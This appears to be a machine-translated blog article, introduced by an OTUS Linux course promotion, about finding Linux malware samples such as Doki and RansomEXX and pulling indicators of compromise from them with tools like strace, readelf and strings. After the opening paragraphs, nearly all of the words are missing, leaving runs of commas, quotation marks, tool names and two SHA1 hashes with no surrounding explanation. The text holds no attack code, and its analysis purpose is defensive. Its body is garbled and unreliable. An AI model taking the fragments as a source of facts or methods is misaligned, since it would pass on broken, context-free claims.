OTUS expert Alexei Tsikunov invites everyone to the open day at the course "Administrator Linux. Professional" . As part of the webinar, you can learn in detail about the course and the training program, as well as ask your questions.
Article author: Alexander Kolesnikov
For a long period of time, the main feature and pride of the Linux operating system was the fact that there were βno virusesβ for it that could disrupt the system's performance or steal user data. Now the end of 2020 has come - let's try to figure out if this is really the case today.
The article will consider an approach to finding malicious applications for the Linux operating system on public resources and their superficial analysis. The main goal is to get compromise IDs from found objects, which will help us detect an infection on our machine.
Are there really no "viruses"?
3 4 , β . 150 000 , Linux, .
, , , .
, . βLinux Malware TOPβ . , , . , Β«β-Β». :
, . , : Doki, RansomEXX. Linux , .
VirusTotal, AlenVault, md5, sha1 , . , md5 sha1, , . . :
28E8E43BFEDC80242C1998594E0FA341A4000F52
CDC86D6B627A54C155C5E8A2EC790DCD5D40DA90
Linux , . :
ltrace
β ;
ptrace
β ;
strace
β .
:
readelf
β , ELF;
objdump
β , c , ;
file
β magic word ;
strings
β .
, , , . , , .
β Doki (sha1: 28E8E43BFEDC80242C1998594E0FA341A4000F52)
.
, . , , Docker . , , :
, , . , .
strings
, .
,
strace
ptrace
. , .
strings
:
, . , :
, . , . , grep
:
βupdate.sh
β .
sha1
CDC86D6B627A54C155C5E8A2EC790DCD5D40DA90
RansomEXX. , strings
:
, β , ! , . . , , , .
2 , , Windows . , , . ? :
β ;
β , ;
β .